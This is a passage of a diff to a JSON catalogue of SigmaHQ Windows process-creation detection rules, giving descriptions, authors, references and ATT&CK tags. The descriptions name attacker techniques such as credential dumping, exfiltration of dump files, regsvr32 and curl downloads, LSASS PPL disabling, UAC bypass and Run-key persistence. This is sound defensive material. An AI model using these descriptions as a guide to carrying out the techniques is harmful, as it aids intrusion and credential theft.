"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devtoolslauncher.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", + "value": "Devtoolslauncher.exe Executes Specified Binary" + }, + { + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" + ] + }, + "uuid": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "value": "Judgement Panda Credential Access Activity" + }, + { + "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", + "meta": { + "author": "Eli Salem, Sander Wiebing, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate modification of keys" + ], + "filename": "proc_creation_win_regini.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "uuid": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", + "value": "Modifies the Registry From a File" + }, + { + "description": "Detects a suspicious 7zip execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/27", + "falsepositive": [ + "Legitimate use of 7-Zip with a command line in which .dmp appears accidentally" + ], + "filename": "proc_creation_win_susp_7zip_dmp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", + "value": "7Zip Compressing Dump Files" + }, + { + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "meta": { + "author": "Florian Roth (rule), @blu3_team (idea)", + "creation_date": "2019/06/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_double_extension.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html", + "https://twitter.com/blackorbird/status/1140519090961825792", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", + "value": "Suspicious Double Extension" + }, + { + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/03/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2020_10189.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224", + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" + ] + }, + "uuid": "846b866e-2a57-46ee-8e16-85fa92759be7", + "value": "Exploited CVE-2020-10189 Zoho ManageEngine" + }, + { + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_import_cert_susp_locations.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ] + }, + "uuid": "5f6a601c-2ecb-498b-9c33-660362323afa", + "value": "Root Certificate Installed From Susp Locations" + }, + { + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/14", + "falsepositive": [ + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" + ], + "filename": "proc_creation_win_susp_servu_process_pattern.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" + ] + }, + "uuid": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", + "value": "Suspicious Serv-U Process Pattern" + }, + { + "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wsudo_susp_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/M2Team/Privexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1059" + ] + }, + "uuid": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "value": "Wsudo Suspicious Execution" }, { "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", @@ -43910,157 +37129,1532 @@ "value": "Office Processes Proxy Execution Through WMIC" }, { - "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio", + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", "meta": { - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team", - "creation_date": "2018/04/06", + "author": "Florian Roth", + "creation_date": "2022/01/11", "falsepositive": [ - "Unknown" + "FQDNs that start with a number" ], - "filename": "proc_creation_win_office_shell.yml", + "filename": "proc_creation_win_susp_regsvr32_http_pattern.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_shell.yml" + "https://twitter.com/tccontre18/status/1480950986650832903", + "https://twitter.com/mrd0x/status/1461041276514623491c19-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml" ], "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1218.010" ] }, - "uuid": "438025f9-5856-4663-83f7-52f878a70a50", - "value": "Microsoft Office Product Spawning Windows Shell" + "uuid": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "value": "Suspicious Regsvr32 HTTP IP Pattern" }, { - "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", + "description": "Detects a curl process start on Windows, which indicates a file download from a remote location or a simple web request to a remote server", "meta": { - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", - "creation_date": "2021/08/23", + "author": "Florian Roth", + "creation_date": "2022/07/05", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "filename": "proc_creation_win_curl_download.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "bbeaed61-1990-4773-bf57-b81dbad7db2d", + "value": "Curl Usage on Windows" + }, + { + "description": "Detects PowerShell Strings applied to rundll as seen in PowerShdll.dll", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/08/25", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_office_spawning_wmi_commandline.yml", + "filename": "proc_creation_win_powershell_dll_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawning_wmi_commandline.yml" + "https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_dll_execution.yml" ], "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.011" ] }, - "uuid": "04f5363a-6bca-42ff-be70-0d28bf629ead", - "value": "Office Applications Spawning Wmi Cli Alternate" + "uuid": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "value": "Detection of PowerShell Execution via DLL" }, { - "description": "Detects an executable in the users directory started from Microsoft Word, Excel, Powerpoint, Publisher or Visio", + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", "meta": { - "author": "Jason Lynch", - "creation_date": "2019/04/02", + "author": "Maxime Thiebaut (@0xThiebaut)", + "creation_date": "2021/10/21", "falsepositive": [ - "Unknown" + "Legitimate usage of the uncommon Windows Work Folders feature." ], - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml", + "filename": "proc_creation_win_susp_workfolders.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "sha256=23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57c", - "https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml" + "https://twitter.com/elliotkillick/status/1449812843772227588", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml" ], "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" + "attack.defense_evasion", + "attack.t1218" ] }, - "uuid": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", - "value": "MS Office Product Spawning Exe in User Dir" + "uuid": "0bbc6369-43e3-453d-9944-cae58821c173", + "value": "Execution via WorkFolders.exe" }, { - "description": "Detects svchost process spawning an instance of an office application. This happens when the initial word application create an instance of one of the office COM objects such as 'Word.Application', 'Excel.Application'...etc. This can be used by malicious actor to create a malicious office document with macros on the fly. (See vba2clr project in reference)", + "description": "Detects suspicious sub processes spawned by PowerShell", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/13", + "author": "Florian Roth, Tim Shelton", + "creation_date": "2022/04/26", "falsepositive": [ - "Legitimate usage of office automation via scripting" + "Unknown" ], - "filename": "proc_creation_win_office_svchost_child.yml", + "filename": "proc_creation_win_susp_powershell_sub_processes.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ankit_anubhav/status/1518835408502620162", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml" + ], + "tags": "No established tags" + }, + "uuid": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", + "value": "Suspicious PowerShell Sub Processes" + }, + { + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "meta": { + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "creation_date": "2020/10/10", + "falsepositive": [ + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + ], + "filename": "proc_creation_win_root_certificate_installed.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic", - "https://github.com/med0x2e/vba2clr", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_root_certificate_installed.yml" ], "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1553.004" ] }, - "uuid": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", - "value": "Svchost Spawning Office Application" + "uuid": "46591fae-7a4c-46ea-aec3-dff5e6d785dc", + "value": "Root Certificate Installed" }, { - "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Outlook", + "description": "Detects net use command combo which executes files from WebDAV server; seen in malicious LNK files", "meta": { - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team", - "creation_date": "2022/02/28", + "author": "pH-T", + "creation_date": "2022/09/01", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_outlook_shell.yml", + "filename": "proc_creation_win_susp_net_use.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_outlook_shell.yml" + "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior", + "https://twitter.com/ShadowChasing1/status/1552595370961944576", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use.yml" ], "tags": [ "attack.execution", - "attack.t1204.002" + "attack.t1059.001" ] }, - "uuid": "208748f7-881d-47ac-a29c-07ea84bf691d", - "value": "Microsoft Outlook Product Spawning Windows Shell" + "uuid": "f0507c0f-a3a2-40f5-acc6-7f543c334993", + "value": "Suspicious Net Use Command Combo" }, { - "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2017_8759.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", + "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "fdd84c68-a1f6-47c9-9477-920584f94905", + "value": "Exploit for CVE-2017-8759" + }, + { + "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/22", + "creation_date": "2022/08/19", "falsepositive": [ - "Legitimate use of the PDQDeploy tool to execute these commands" + "Unknown" ], - "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml", + "filename": "proc_creation_win_lolbin_customshellhost.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/malmoeb/status/1550483085472432128", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml" + "https://github.com/LOLBAS-Project/LOLBAS/pull/180", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "84b14121-9d14-416e-800b-f3b829c5a14d", + "value": "Suspicious CustomShellHost Execution" + }, + { + "description": "Detects reg command lines that disables PPL on the LSA process", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_reg_lsass_ppl.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsass_ppl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.010" + ] + }, + "uuid": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "value": "Registry Disabling LSASS PPL" + }, + { + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "filename": "proc_creation_win_susp_psexesvc_as_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml" ], "tags": [ "attack.execution" ] }, - "uuid": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", - "value": "Suspicious Execution Of PDQDeployRunner" + "uuid": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "value": "PsExec Service Execution as LOCAL SYSTEM" + }, + { + "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks. In order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.", + "meta": { + "author": "Sreeman", + "creation_date": "2020/09/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_abusing_windows_telemetry_for_persistence.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_windows_telemetry_for_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "f548a603-c9f2-4c89-b511-b089f7e94549", + "value": "Potential Persistence Execution Via Microsoft Compatibility Appraiser" + }, + { + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "meta": { + "author": "Christian Burkard, pH-T", + "creation_date": "2022/03/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_base64_reflective_assembly_load.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_reflective_assembly_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027", + "attack.t1620" + ] + }, + "uuid": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", + "value": "Base64 Encoded Reflective Assembly Load" + }, + { + "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Legitmate processes that run at logon. Filter according to your environment" + ], + "filename": "proc_creation_win_susp_schtasks_schedule_type.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "value": "Suspicious Schtasks Schedule Types" + }, + { + "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_char_in_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_char_in_cmd.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "e0552b19-5a83-4222-b141-b36184bb8d79", + "value": "Obfuscated Command Line Using Special Unicode Characters" + }, + { + "description": "Execute VBscript code that is referenced within the *.bgi file.", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2019/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_bginfo.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bginfo.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "aaf46cdc-934e-4284-b329-34aa701e3771", + "value": "Application Whitelisting Bypass via Bginfo" + }, + { + "description": "Detects wmic known recon method to look for unquoted service paths, often used by pentest and attackers enum scripts", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_unquoted_service_search.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", + "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "68bcd73b-37ef-49cb-95fc-edc809730be6", + "value": "WMIC Unquoted Services Path Lookup" + }, + { + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_eventvwr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", + "https://twitter.com/orange_8361/status/1518970259868626944", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ] + }, + "uuid": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "value": "UAC Bypass Using Event Viewer RecentViews" + }, + { + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_renamed_adfind.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://www.joeware.net/freetools/tools/adfind/", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" + ] + }, + "uuid": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", + "value": "Renamed AdFind Detection" + }, + { + "description": "Detects the execution of a renamed meg.exe of MegaSync during incident response engagements associated with ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/06/22", + "falsepositive": [ + "Software that illegaly integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" + ], + "filename": "proc_creation_win_renamed_megasync.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/rclone-mega-extortion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_megasync.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "value": "Renamed MegaSync" + }, + { + "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/28", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" + ], + "filename": "proc_creation_win_reg_add_run_key.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/", + "https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "de587dce-915e-4218-aac4-835ca6af6f70", + "value": "Reg Add RUN Key" + }, + { + "description": "Detects activity that could be related to Baby Shark malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_babyshark.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1218.005" + ] + }, + "uuid": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "value": "Baby Shark Activity" + }, + { + "description": "Detects suspicious process run from unusual locations", + "meta": { + "author": "juju4, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/01/16", + "falsepositive": [ 